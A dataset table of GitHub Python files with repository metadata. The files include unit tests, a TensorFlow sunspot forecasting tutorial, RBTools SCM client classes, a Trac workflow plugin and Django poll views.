blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33005c08d1fa27ad94fd3cfce0a9e2a34fb73d30 | 71ef27e3ab0ad5831169fd978ceb643315e338b5 | /FileServer/htmlrunall.py | a438dd80ed1df2a4f18984c2c0ac753323ff5691 | [] | no_license | BetterMe1/FileServer | 8e26e968be3a4c433b1397411a475f75973d9cac | 28d221361716c891d6c61afbfe9753db8250ae9d | refs/heads/master | 2020-06-26T12:03:14.132580 | 2019-07-30T10:07:02 | 2019-07-30T10:07:02 | 199,625,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | # -*- coding: utf-8 -*-
#手工添加案例到套件
import HTMLTestRunner
import os
import sys
import time
import unittest
from FileServer import testupload, testview, testdown, testdelete
def createsuite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(testupload.Testupload))
suite.addTest(unittest.makeSuite(testview.Testview))
suite.addTest(unittest.makeSuite(testdown.Testdown))
suite.addTest(unittest.makeSuite(testdelete.Testdelete))
return suite
if __name__=="__main__":
curpath=sys.path[0]
#取当前时间
now=time.strftime("%Y-%m-%d-%H %M %S",time.localtime(time.time()))
if not os.path.exists(curpath+'/resultreport'):
os.makedirs(curpath+'/resultreport')
filename=curpath+'/resultreport/'+now+'resultreport.html'
with open(filename,'wb') as fp:
#出html报告
runner=HTMLTestRunner.HTMLTestRunner(stream=fp,title=u'测试报告',description=u'用例执行情况',verbosity=2)
suite=createsuite()
runner.run(suite) | [
"1754217281@qq.com"
] | 1754217281@qq.com |
1b86396c56bba0043c82a7ddfa850a584867cba8 | 88a98cbddb0aa0b70a387f2b39f3a81db1e8501c | /inst/python/course4/week4/Lesson5.py | 28c7115b1e249502f596f8a0fc7e3b199eaa0658 | [] | no_license | ifrit98/tensorflow-coursera | e4a88c8da8d1cc447d92bb3b9b2359ebf458c512 | 4f593d38a350fa89ec594a2bfdefa808256a8f95 | refs/heads/master | 2022-08-03T06:11:58.429806 | 2020-05-31T16:23:08 | 2020-05-31T16:23:08 | 262,175,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,013 | py | # -*- coding: utf-8 -*-
"""S+P Week 4 Lesson 5.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/github/lmoroney/dlaicourse/blob/master/TensorFlow%20In%20Practice/Course%204%20-%20S%2BP/S%2BP%20Week%204%20Lesson%205.ipynb
"""
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
print(tf.__version__)
import numpy as np
import matplotlib.pyplot as plt
def plot_series(time, series, format="-", start=0, end=None):
plt.plot(time[start:end], series[start:end], format)
plt.xlabel("Time")
plt.ylabel("Value")
plt.grid(True)
!wget --no-check-certificate \
https://storage.googleapis.com/laurencemoroney-blog.appspot.com/Sunspots.csv \
-O /tmp/sunspots.csv
import csv
time_step = []
sunspots = []
with open('/tmp/sunspots.csv') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
next(reader)
for row in reader:
sunspots.append(float(row[2]))
time_step.append(int(row[0]))
series = np.array(sunspots)
time = np.array(time_step)
plt.figure(figsize=(10, 6))
plot_series(time, series)
series = np.array(sunspots)
time = np.array(time_step)
plt.figure(figsize=(10, 6))
plot_series(time, series)
split_time = 3000
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
window_size = 30
batch_size = 32
shuffle_buffer_size = 1000
def windowed_dataset(series, window_size, batch_size, shuffle_buffer):
series = tf.expand_dims(series, axis=-1)
ds = tf.data.Dataset.from_tensor_slices(series)
ds = ds.window(window_size + 1, shift=1, drop_remainder=True)
ds = ds.flat_map(lambda w: w.batch(window_size + 1))
ds = ds.shuffle(shuffle_buffer)
ds = ds.map(lambda w: (w[:-1], w[1:]))
return ds.batch(batch_size).prefetch(1)
def model_forecast(model, series, window_size):
ds = tf.data.Dataset.from_tensor_slices(series)
ds = ds.window(window_size, shift=1, drop_remainder=True)
ds = ds.flat_map(lambda w: w.batch(window_size))
ds = ds.batch(32).prefetch(1)
forecast = model.predict(ds)
return forecast
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
window_size = 64
batch_size = 256
train_set = windowed_dataset(x_train, window_size, batch_size, shuffle_buffer_size)
print(train_set)
print(x_train.shape)
model = tf.keras.models.Sequential([
tf.keras.layers.Conv1D(filters=32, kernel_size=5,
strides=1, padding="causal",
activation="relu",
input_shape=[None, 1]),
tf.keras.layers.LSTM(64, return_sequences=True),
tf.keras.layers.LSTM(64, return_sequences=True),
tf.keras.layers.Dense(30, activation="relu"),
tf.keras.layers.Dense(10, activation="relu"),
tf.keras.layers.Dense(1),
tf.keras.layers.Lambda(lambda x: x * 400)
])
lr_schedule = tf.keras.callbacks.LearningRateScheduler(
lambda epoch: 1e-8 * 10**(epoch / 20))
optimizer = tf.keras.optimizers.SGD(lr=1e-8, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
optimizer=optimizer,
metrics=["mae"])
history = model.fit(train_set, epochs=100, callbacks=[lr_schedule])
plt.semilogx(history.history["lr"], history.history["loss"])
plt.axis([1e-8, 1e-4, 0, 60])
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
train_set = windowed_dataset(x_train, window_size=60, batch_size=100, shuffle_buffer=shuffle_buffer_size)
model = tf.keras.models.Sequential([
tf.keras.layers.Conv1D(filters=60, kernel_size=5,
strides=1, padding="causal",
activation="relu",
input_shape=[None, 1]),
tf.keras.layers.LSTM(60, return_sequences=True),
tf.keras.layers.LSTM(60, return_sequences=True),
tf.keras.layers.Dense(30, activation="relu"),
tf.keras.layers.Dense(10, activation="relu"),
tf.keras.layers.Dense(1),
tf.keras.layers.Lambda(lambda x: x * 400)
])
optimizer = tf.keras.optimizers.SGD(lr=1e-5, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
optimizer=optimizer,
metrics=["mae"])
history = model.fit(train_set,epochs=500)
rnn_forecast = model_forecast(model, series[..., np.newaxis], window_size)
rnn_forecast = rnn_forecast[split_time - window_size:-1, -1, 0]
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, rnn_forecast)
tf.keras.metrics.mean_absolute_error(x_valid, rnn_forecast).numpy()
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
#-----------------------------------------------------------
# Retrieve a list of list results on training and test data
# sets for each training epoch
#-----------------------------------------------------------
loss=history.history['loss']
epochs=range(len(loss)) # Get number of epochs
#------------------------------------------------
# Plot training and validation loss per epoch
#------------------------------------------------
plt.plot(epochs, loss, 'r')
plt.title('Training loss')
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.legend(["Loss"])
plt.figure()
zoomed_loss = loss[200:]
zoomed_epochs = range(200,500)
#------------------------------------------------
# Plot training and validation loss per epoch
#------------------------------------------------
plt.plot(zoomed_epochs, zoomed_loss, 'r')
plt.title('Training loss')
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.legend(["Loss"])
plt.figure()
print(rnn_forecast)
| [
"jason.st.george@neidinc.com"
] | jason.st.george@neidinc.com |
cd9c5f0b38a417ed37d7647c132d0f6a38efce1e | 066e874cc6d72d82e098d81a220cbbb1d66948f7 | /.hubspot/lib/python2.7/site-packages/rbtools/clients/__init__.py | dfb90185c05b6a487e37edf0bffcced75b55a8a2 | [] | no_license | webdeveloper001/flask-inboundlead | 776792485a998a0eaa4b14016c3a2066e75ff2a2 | d0a539d86342e9efc54d0c0a1adc02c609f0f762 | refs/heads/master | 2021-01-19T01:34:55.241144 | 2017-04-05T00:42:03 | 2017-04-05T00:42:03 | 87,248,885 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,675 | py | from __future__ import print_function, unicode_literals
import logging
import pkg_resources
import re
import six
import sys
from rbtools.utils.process import die, execute
# The clients are lazy loaded via load_scmclients()
SCMCLIENTS = None
class PatchResult(object):
"""The result of a patch operation.
This stores state on whether the patch could be applied (fully or
partially), whether there are conflicts that can be resolved (as in
conflict markers, not reject files), which files conflicted, and the
patch output.
"""
def __init__(self, applied, has_conflicts=False,
conflicting_files=[], patch_output=None):
self.applied = applied
self.has_conflicts = has_conflicts
self.conflicting_files = conflicting_files
self.patch_output = patch_output
class SCMClient(object):
"""A base representation of an SCM tool.
These are used for fetching repository information and generating diffs.
"""
name = None
supports_diff_extra_args = False
supports_diff_exclude_patterns = False
supports_patch_revert = False
can_amend_commit = False
can_merge = False
can_push_upstream = False
can_delete_branch = False
def __init__(self, config=None, options=None):
self.config = config or {}
self.options = options
self.capabilities = None
def get_repository_info(self):
return None
def check_options(self):
pass
def get_changenum(self, revisions):
"""Return the change number for the given revisions.
This is only used when the client is supposed to send a change number
to the server (such as with Perforce).
Args:
revisions (dict):
A revisions dictionary as returned by ``parse_revision_spec``.
Returns:
unicode:
The change number to send to the Review Board server.
"""
return None
def scan_for_server(self, repository_info):
"""Find the server path.
This will search for the server name in the .reviewboardrc config
files. These are loaded with the current directory first, and searching
through each parent directory, and finally $HOME/.reviewboardrc last.
"""
return self._get_server_from_config(self.config, repository_info)
def parse_revision_spec(self, revisions=[]):
"""Parses the given revision spec.
The 'revisions' argument is a list of revisions as specified by the
user. Items in the list do not necessarily represent a single revision,
since the user can use SCM-native syntaxes such as "r1..r2" or "r1:r2".
SCMTool-specific overrides of this method are expected to deal with
such syntaxes.
This will return a dictionary with the following keys:
'base': A revision to use as the base of the resulting diff.
'tip': A revision to use as the tip of the resulting diff.
'parent_base': (optional) The revision to use as the base of a
parent diff.
These will be used to generate the diffs to upload to Review Board (or
print). The diff for review will include the changes in (base, tip],
and the parent diff (if necessary) will include (parent, base].
If a single revision is passed in, this will return the parent of that
revision for 'base' and the passed-in revision for 'tip'.
If zero revisions are passed in, this will return revisions relevant
for the "current change". The exact definition of what "current" means
is specific to each SCMTool backend, and documented in the
implementation classes.
"""
return {
'base': None,
'tip': None,
}
def diff(self, revisions, include_files=[], exclude_patterns=[],
extra_args=[]):
"""
Returns the generated diff and optional parent diff for this
repository.
The return value must be a dictionary, and must have, at a minimum,
a 'diff' field. A 'parent_diff' can also be provided.
It may also return 'base_commit_id', representing the revision/ID of
the commit that the diff or parent diff is based on. This exists
because in some diff formats, this may different from what's provided
in the diff.
"""
return {
'diff': None,
'parent_diff': None,
'base_commit_id': None,
}
def _get_server_from_config(self, config, repository_info):
if 'REVIEWBOARD_URL' in config:
return config['REVIEWBOARD_URL']
elif 'TREES' in config:
trees = config['TREES']
if not isinstance(trees, dict):
die('Warning: "TREES" in config file is not a dict!')
# If repository_info is a list, check if any one entry is in trees.
path = None
if isinstance(repository_info.path, list):
for path in repository_info.path:
if path in trees:
break
else:
path = None
elif repository_info.path in trees:
path = repository_info.path
if path and 'REVIEWBOARD_URL' in trees[path]:
return trees[path]['REVIEWBOARD_URL']
return None
def _get_p_number(self, base_path, base_dir):
"""Return the appropriate value for the -p argument to patch.
This function returns an integer. If the integer is -1, then the -p
option should not be provided to patch. Otherwise, the return value is
the argument to patch -p.
"""
if base_path and base_dir.startswith(base_path):
return base_path.count('/') + 1
else:
return -1
def _strip_p_num_slashes(self, files, p_num):
"""Strips the smallest prefix containing p_num slashes from file names.
To match the behavior of the patch -pX option, adjacent slashes are
counted as a single slash.
"""
if p_num > 0:
regex = re.compile(r'[^/]*/+')
return [regex.sub('', f, p_num) for f in files]
else:
return files
def _execute(self, cmd, *args, **kwargs):
"""
Prints the results of the executed command and returns
the data result from execute.
"""
return execute(cmd, ignore_errors=True, *args, **kwargs)
def has_pending_changes(self):
"""Checks if there are changes waiting to be committed.
Derived classes should override this method if they wish to support
checking for pending changes.
"""
raise NotImplementedError
def apply_patch(self, patch_file, base_path, base_dir, p=None,
revert=False):
"""Apply the patch and return a PatchResult indicating its success."""
# Figure out the -p argument for patch. We override the calculated
# value if it is supplied via a commandline option.
p_num = p or self._get_p_number(base_path, base_dir)
cmd = ['patch']
if revert:
cmd.append('-R')
if p_num >= 0:
cmd.append('-p%d' % p_num)
cmd.extend(['-i', six.text_type(patch_file)])
# Ignore return code 2 in case the patch file consists of only empty
# files, which 'patch' can't handle. Other 'patch' errors also give
# return code 2, so we must check the command output.
rc, patch_output = execute(cmd, extra_ignore_errors=(2,),
return_error_code=True)
only_garbage_in_patch = ('patch: **** Only garbage was found in the '
'patch input.\n')
if (patch_output and patch_output.startswith('patch: **** ') and
patch_output != only_garbage_in_patch):
die('Failed to execute command: %s\n%s' % (cmd, patch_output))
# Check the patch for any added/deleted empty files to handle.
if self.supports_empty_files():
try:
with open(patch_file, 'rb') as f:
patch = f.read()
except IOError as e:
logging.error('Unable to read file %s: %s', patch_file, e)
return
patched_empty_files = self.apply_patch_for_empty_files(
patch, p_num, revert=revert)
# If there are no empty files in a "garbage-only" patch, the patch
# is probably malformed.
if (patch_output == only_garbage_in_patch and
not patched_empty_files):
die('Failed to execute command: %s\n%s' % (cmd, patch_output))
# TODO: Should this take into account apply_patch_for_empty_files ?
# The return value of that function is False both when it fails
# and when there are no empty files.
return PatchResult(applied=(rc == 0), patch_output=patch_output)
def create_commit(self, message, author, run_editor,
files=[], all_files=False):
"""Creates a commit based on the provided message and author.
Derived classes should override this method if they wish to support
committing changes to their repositories.
"""
raise NotImplementedError
def get_commit_message(self, revisions):
"""Returns the commit message from the commits in the given revisions.
This pulls out the first line from the commit messages of the
given revisions. That is then used as the summary.
"""
commit_message = self.get_raw_commit_message(revisions)
lines = commit_message.splitlines()
if not lines:
return None
result = {
'summary': lines[0],
}
# Try to pull the body of the commit out of the full commit
# description, so that we can skip the summary.
if len(lines) >= 3 and lines[0] and not lines[1]:
result['description'] = '\n'.join(lines[2:]).strip()
else:
result['description'] = commit_message
return result
def delete_branch(self, branch_name, merged_only=True):
"""Deletes the specified branch.
If merged_only is False, then the branch will be deleted even if not
yet merged into an upstream branch.
"""
raise NotImplementedError
def merge(self, target, destination, message, author, squash=False,
run_editor=False):
"""Merges the target branch with destination branch."""
raise NotImplementedError
def push_upstream(self, remote_branch):
"""Pushes the current branch to upstream."""
raise NotImplementedError
def get_raw_commit_message(self, revisions):
"""Extracts the commit messages on the commits in the given revisions.
Derived classes should override this method in order to allow callers
to fetch commit messages. This is needed for description guessing.
If a derived class is unable to fetch the description, ``None`` should
be returned.
Callers that need to differentiate the summary from the description
should instead use get_commit_message().
"""
raise NotImplementedError
def get_current_branch(self):
"""Returns the repository branch name of the current directory.
Derived classes should override this method if they are able to
determine the current branch of the working directory.
If a derived class is unable to unable to determine the branch,
``None`` should be returned.
"""
raise NotImplementedError
def supports_empty_files(self):
"""Check if the RB server supports added/deleted empty files.
This method returns False. To change this behaviour, override it in a
subclass.
"""
return False
def apply_patch_for_empty_files(self, patch, p_num, revert=False):
"""Return True if any empty files in the patch are applied.
If there are no empty files in the patch or if an error occurs while
applying the patch, we return False.
"""
raise NotImplementedError
def amend_commit_description(self, message, revisions=None):
"""Update a commit message to the given string.
The optional revisions argument exists to provide compatibility with
SCMs that allow modification of multiple changesets at any given time.
It takes a parsed revision spec, and will amend the change referenced
by the tip revision therein.
"""
raise NotImplementedError
class RepositoryInfo(object):
"""
A representation of a source code repository.
"""
def __init__(self, path=None, base_path=None, supports_changesets=False,
supports_parent_diffs=False):
self.path = path
self.base_path = base_path
self.supports_changesets = supports_changesets
self.supports_parent_diffs = supports_parent_diffs
logging.debug('repository info: %s' % self)
def __str__(self):
return 'Path: %s, Base path: %s, Supports changesets: %s' % \
(self.path, self.base_path, self.supports_changesets)
def set_base_path(self, base_path):
if not base_path.startswith('/'):
base_path = '/' + base_path
logging.debug('changing repository info base_path from %s to %s',
(self.base_path, base_path))
self.base_path = base_path
def find_server_repository_info(self, server):
"""
Try to find the repository from the list of repositories on the server.
For Subversion, this could be a repository with a different URL. For
all other clients, this is a noop.
"""
return self
def load_scmclients(config, options):
global SCMCLIENTS
SCMCLIENTS = {}
for ep in pkg_resources.iter_entry_points(group='rbtools_scm_clients'):
try:
SCMCLIENTS[ep.name] = ep.load()(config=config, options=options)
except Exception:
logging.exception('Could not load SCM Client "%s"', ep.name)
def scan_usable_client(config, options, client_name=None):
from rbtools.clients.perforce import PerforceClient
repository_info = None
tool = None
# TODO: We should only load all of the scm clients if the
# client_name isn't provided.
if SCMCLIENTS is None:
load_scmclients(config, options)
if client_name:
if client_name not in SCMCLIENTS:
logging.error('The provided repository type "%s" is invalid.' %
client_name)
sys.exit(1)
else:
scmclients = {
client_name: SCMCLIENTS[client_name]
}
else:
scmclients = SCMCLIENTS
for name, tool in six.iteritems(scmclients):
logging.debug('Checking for a %s repository...' % tool.name)
repository_info = tool.get_repository_info()
if repository_info:
break
if not repository_info:
if client_name:
logging.error('The provided repository type was not detected '
'in the current directory.')
elif getattr(options, 'repository_url', None):
logging.error('No supported repository could be accessed at '
'the supplied url.')
else:
logging.error('The current directory does not contain a checkout '
'from a supported source code repository.')
sys.exit(1)
# Verify that options specific to an SCM Client have not been mis-used.
if (getattr(options, 'change_only', False) and
not repository_info.supports_changesets):
sys.stderr.write('The --change-only option is not valid for the '
'current SCM client.\n')
sys.exit(1)
if (getattr(options, 'parent_branch', None) and
not repository_info.supports_parent_diffs):
sys.stderr.write('The --parent option is not valid for the '
'current SCM client.\n')
sys.exit(1)
if (not isinstance(tool, PerforceClient) and
(getattr(options, 'p4_client', None) or
getattr(options, 'p4_port', None))):
sys.stderr.write('The --p4-client and --p4-port options are not valid '
'for the current SCM client.\n')
sys.exit(1)
return (repository_info, tool)
def print_clients(config, options):
"""Print the supported detected SCM clients.
Each SCM client, including those provided by third party packages,
will be printed. Additionally, SCM clients which are detected in
the current directory will be highlighted.
"""
print('The following repository types are supported by this installation')
print('of RBTools. Each "<type>" may be used as a value for the')
print('"--repository-type=<type>" command line argument. Repository types')
print('which are detected in the current directory are marked with a "*"')
print('[*] "<type>": <Name>')
if SCMCLIENTS is None:
load_scmclients(config, options)
for name, tool in six.iteritems(SCMCLIENTS):
repository_info = tool.get_repository_info()
if repository_info:
print(' * "%s": %s' % (name, tool.name))
else:
print(' "%s": %s' % (name, tool.name))
| [
"jamesbrown1018@outlook.com"
] | jamesbrown1018@outlook.com |
a6d5a3c2c9e3bd52dec4be3aadc2b1a52e67fa68 | 771c084505182ddad6728ae68972ae5917159035 | /lime/tests/test_discretize.py | a551a7d1595a08052a2466fe98798eaca0123efb | [
"BSD-2-Clause"
] | permissive | Shopify/lime | 3bb9f494b8173dfbca5b289fd1b3d260bec43aa2 | 4d915072af7e9979c27396a7c7ed97ed54524e54 | refs/heads/master | 2023-06-28T03:31:56.352447 | 2019-08-02T01:50:02 | 2019-08-02T01:50:02 | 199,914,515 | 5 | 6 | BSD-2-Clause | 2023-03-22T06:59:58 | 2019-07-31T19:09:59 | JavaScript | UTF-8 | Python | false | false | 8,124 | py | from unittest import TestCase
import numpy as np
from sklearn.datasets import load_iris
from lime.discretize import QuartileDiscretizer, DecileDiscretizer, EntropyDiscretizer
class TestDiscretize(TestCase):
def setUp(self):
iris = load_iris()
self.feature_names = iris.feature_names
self.x = iris.data
self.y = iris.target
def check_random_state_for_discretizer_class(self, DiscretizerClass):
# ----------------------------------------------------------------------
# -----------Check if the same random_state produces the same-----------
# -------------results for different discretizer instances.-------------
# ----------------------------------------------------------------------
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=10)
x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=10)
x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
self.assertEqual((x_1 == x_2).sum(), x_1.shape[0] * x_1.shape[1])
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=np.random.RandomState(10))
x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=np.random.RandomState(10))
x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
self.assertEqual((x_1 == x_2).sum(), x_1.shape[0] * x_1.shape[1])
# ----------------------------------------------------------------------
# ---------Check if two different random_state values produces----------
# -------different results for different discretizers instances.--------
# ----------------------------------------------------------------------
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=10)
x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=20)
x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
self.assertFalse((x_1 == x_2).sum() == x_1.shape[0] * x_1.shape[1])
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=np.random.RandomState(10))
x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
random_state=np.random.RandomState(20))
x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
self.assertFalse((x_1 == x_2).sum() == x_1.shape[0] * x_1.shape[1])
def test_random_state(self):
self.check_random_state_for_discretizer_class(QuartileDiscretizer)
self.check_random_state_for_discretizer_class(DecileDiscretizer)
self.check_random_state_for_discretizer_class(EntropyDiscretizer)
def test_feature_names_1(self):
self.maxDiff = None
discretizer = QuartileDiscretizer(self.x, [], self.feature_names,
self.y, random_state=10)
self.assertDictEqual(
{0: ['sepal length (cm) <= 5.10',
'5.10 < sepal length (cm) <= 5.80',
'5.80 < sepal length (cm) <= 6.40',
'sepal length (cm) > 6.40'],
1: ['sepal width (cm) <= 2.80',
'2.80 < sepal width (cm) <= 3.00',
'3.00 < sepal width (cm) <= 3.30',
'sepal width (cm) > 3.30'],
2: ['petal length (cm) <= 1.60',
'1.60 < petal length (cm) <= 4.35',
'4.35 < petal length (cm) <= 5.10',
'petal length (cm) > 5.10'],
3: ['petal width (cm) <= 0.30',
'0.30 < petal width (cm) <= 1.30',
'1.30 < petal width (cm) <= 1.80',
'petal width (cm) > 1.80']},
discretizer.names)
def test_feature_names_2(self):
self.maxDiff = None
discretizer = DecileDiscretizer(self.x, [], self.feature_names, self.y,
random_state=10)
self.assertDictEqual(
{0: ['sepal length (cm) <= 4.80',
'4.80 < sepal length (cm) <= 5.00',
'5.00 < sepal length (cm) <= 5.27',
'5.27 < sepal length (cm) <= 5.60',
'5.60 < sepal length (cm) <= 5.80',
'5.80 < sepal length (cm) <= 6.10',
'6.10 < sepal length (cm) <= 6.30',
'6.30 < sepal length (cm) <= 6.52',
'6.52 < sepal length (cm) <= 6.90',
'sepal length (cm) > 6.90'],
1: ['sepal width (cm) <= 2.50',
'2.50 < sepal width (cm) <= 2.70',
'2.70 < sepal width (cm) <= 2.80',
'2.80 < sepal width (cm) <= 3.00',
'3.00 < sepal width (cm) <= 3.10',
'3.10 < sepal width (cm) <= 3.20',
'3.20 < sepal width (cm) <= 3.40',
'3.40 < sepal width (cm) <= 3.61',
'sepal width (cm) > 3.61'],
2: ['petal length (cm) <= 1.40',
'1.40 < petal length (cm) <= 1.50',
'1.50 < petal length (cm) <= 1.70',
'1.70 < petal length (cm) <= 3.90',
'3.90 < petal length (cm) <= 4.35',
'4.35 < petal length (cm) <= 4.64',
'4.64 < petal length (cm) <= 5.00',
'5.00 < petal length (cm) <= 5.32',
'5.32 < petal length (cm) <= 5.80',
'petal length (cm) > 5.80'],
3: ['petal width (cm) <= 0.20',
'0.20 < petal width (cm) <= 0.40',
'0.40 < petal width (cm) <= 1.16',
'1.16 < petal width (cm) <= 1.30',
'1.30 < petal width (cm) <= 1.50',
'1.50 < petal width (cm) <= 1.80',
'1.80 < petal width (cm) <= 1.90',
'1.90 < petal width (cm) <= 2.20',
'petal width (cm) > 2.20']},
discretizer.names)
def test_feature_names_3(self):
self.maxDiff = None
discretizer = EntropyDiscretizer(self.x, [], self.feature_names,
self.y, random_state=10)
self.assertDictEqual(
{0: ['sepal length (cm) <= 4.85',
'4.85 < sepal length (cm) <= 5.45',
'5.45 < sepal length (cm) <= 5.55',
'5.55 < sepal length (cm) <= 5.85',
'5.85 < sepal length (cm) <= 6.15',
'6.15 < sepal length (cm) <= 7.05',
'sepal length (cm) > 7.05'],
1: ['sepal width (cm) <= 2.45',
'2.45 < sepal width (cm) <= 2.95',
'2.95 < sepal width (cm) <= 3.05',
'3.05 < sepal width (cm) <= 3.35',
'3.35 < sepal width (cm) <= 3.45',
'3.45 < sepal width (cm) <= 3.55',
'sepal width (cm) > 3.55'],
2: ['petal length (cm) <= 2.45',
'2.45 < petal length (cm) <= 4.45',
'4.45 < petal length (cm) <= 4.75',
'4.75 < petal length (cm) <= 5.15',
'petal length (cm) > 5.15'],
3: ['petal width (cm) <= 0.80',
'0.80 < petal width (cm) <= 1.35',
'1.35 < petal width (cm) <= 1.75',
'1.75 < petal width (cm) <= 1.85',
'petal width (cm) > 1.85']},
discretizer.names)
| [
"bruno.filipe.silva.dias@gmail.com"
] | bruno.filipe.silva.dias@gmail.com |
33f9f615f757e2f55f53d6b631f702238525a791 | 4124ea6a88f11cbd5967a6c8570a23ea6b43e01d | /代码/hei_ma/Demo04_while循环.py | b348f11621c22d3138e67b9047ee8701c0d63ec4 | [] | no_license | ZYSLLZYSLL/Python | 75a26f953808c4aa29a98a97d43cf5509f6e569c | b83451567517b8c77bafece95126e67f4a19755e | refs/heads/master | 2023-03-29T12:49:31.559651 | 2021-03-22T05:18:19 | 2021-03-22T05:18:19 | 349,715,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2021/1/7 16:13
# @Author : ZY
# @File : Demo04_while循环.py
# @Project : code
# 需求:重复五次“hello world”
count = 0
while count < 5:
count += 1
print("hello world")
| [
"15239938038@163.com"
] | 15239938038@163.com |
2817e381387844503d0a8a23ce38dce22987fa80 | 4569d707a4942d3451f3bbcfebaa8011cc5a128d | /typedticketworkflowplugin/0.11/typedworkflow/controller.py | 953eba41a2c646cb88e789e751aa9e107b752c84 | [] | no_license | woochica/trachacks | 28749b924c897747faa411876a3739edaed4cff4 | 4fcd4aeba81d734654f5d9ec524218b91d54a0e1 | refs/heads/master | 2021-05-30T02:27:50.209657 | 2013-05-24T17:31:23 | 2013-05-24T17:31:23 | 13,418,837 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | from trac.core import implements, Component
from trac.ticket import model
from trac.ticket.api import ITicketActionController
from trac.ticket.default_workflow import ConfigurableTicketWorkflow
class TypedTicketWorkflow(ConfigurableTicketWorkflow):
"""Add type attribute filter """
def get_ticket_actions(self, req, ticket):
actions = ConfigurableTicketWorkflow.get_ticket_actions(self, req, ticket)
actions = self.filter_actions(actions, ticket)
return actions
def filter_actions(self, action, ticket):
"""Finds the actions that use this operation"""
filterd_actions = []
for default, action_name in action:
action_attributes = self.actions[action_name]
if 'tickettype' in action_attributes:
#TODO normalization this should be done only once
required_types = [a.strip() for a in
action_attributes['tickettype'].split(',')]
if ticket.get_value_or_default('type') in required_types:
filterd_actions.append((default, action_name))
else:
filterd_actions.append((default, action_name))
return filterd_actions | [
"kivsiak@7322e99d-02ea-0310-aa39-e9a107903beb"
] | kivsiak@7322e99d-02ea-0310-aa39-e9a107903beb |
dde16a1e32e69757b5fbd798809ccbcf942a874f | e1f73211a76e1afebb8ffca06a3f5b7b8947ece9 | /polls/views.py | 20e19d68e76705be5454461084798af2a89e63c9 | [] | no_license | sunilBzl/polls-app | 5dd1421bab9c47c4bbb3bece83789fc91fd7ba30 | 3461f41d630f527711b9d00b8e5813b38d2fe6f1 | refs/heads/main | 2023-08-26T06:02:52.500081 | 2021-11-02T03:52:51 | 2021-11-02T03:52:51 | 423,446,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,200 | py | from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views import generic
from .models import Choice, Question
# Create your views here.
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
return Question.objects.order_by('-pub_date')[0:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
class ResultView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
question = get_object_or_404(Question, pk = question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
return render(request, 'polls/detail.html', {
'question':question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"sunil.bhujel@aayulogic.com"
] | sunil.bhujel@aayulogic.com |
